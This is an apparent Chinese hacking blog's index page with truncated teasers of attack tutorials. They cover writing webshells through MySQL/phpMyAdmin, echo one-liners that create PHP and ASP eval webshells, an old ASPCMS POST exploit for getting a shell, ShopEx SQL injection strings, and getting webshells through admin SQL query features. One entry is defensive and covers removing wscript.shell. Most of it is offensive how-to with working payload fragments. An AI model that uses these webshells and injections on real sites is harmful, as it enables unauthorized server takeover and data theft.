写入mysql_通过MySQL写入webshell的几种方式!

当我们通过测试发现SQL注入,或拿到像phpMyAdmin之类的web数据库可视化管理工具,并想要进行下一步渗透的时候,可通过数据库写入webshell到目标服务器上,利用webshell管理工具控制目标服务器。下面将讲述几个通过MySQL数据库写入webshell的方法,以拿到phpMyAdmin为例。 -01- 通过outfile写入shell 利用条件: 1、root权限2、网站的绝对路径且...

- 阅读全文 -

cmd生成webshell语句

linux:echo -e "<?@include(\$_POST["c"]);?>" > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c win:      echo ^<%eval request("c")%^> >>webshell.cc.asp                   会再同目录下生成we...

- 阅读全文 -

ASPCMS 老版本秒杀拿SHELL

老的ASPCMS版本的秒杀拿SHELL漏洞 找到后台。。。然后 /admin/_system/AspCms_SiteSetting.asp?action=saves 直接POST runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&S...

- 阅读全文 -

shopex两处通杀注入

一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。 如何注入就不多说了,自己捉摸! https://www.webshell.cc/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html https://www.webshell.cc/comment-8967'/**/and/**/Ex...

- 阅读全文 -

TNTHK小组内部版webshell密码破解

下面简单的揭露下怎么获取webshell后门密码 1. 在password登陆框 随便输入一错误密码,提示error,如图: 2. 然后右键查看源文件,搜索[password],font 后面跟的就是shell的密码,测试一下 3. 按照上面的方法,貌似通杀…

- 阅读全文 -

利用后台SQL查询语句拿webshell

今天,朋友给了一个比较好玩的后台   有SQL查询功能     在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥了   以下拿webshell步骤   第一句代码   create table cmd (a varchar(5...

- 阅读全文 -

删除、恢复wscript.shell

由于担心有些网站有注入漏洞,在安装服务器的时候删除了FSO,stream,WSCRIPT.SHELL等组建。结果安装VMware的时候,提示wscript.shell找不到。   恢复wscript.shell   建议如果真的为了安全一定要删除这些!   下面给出卸载和删除的方法   卸载wscript.shell对象,在cmd下或直接运行:regsvr3...

- 阅读全文 -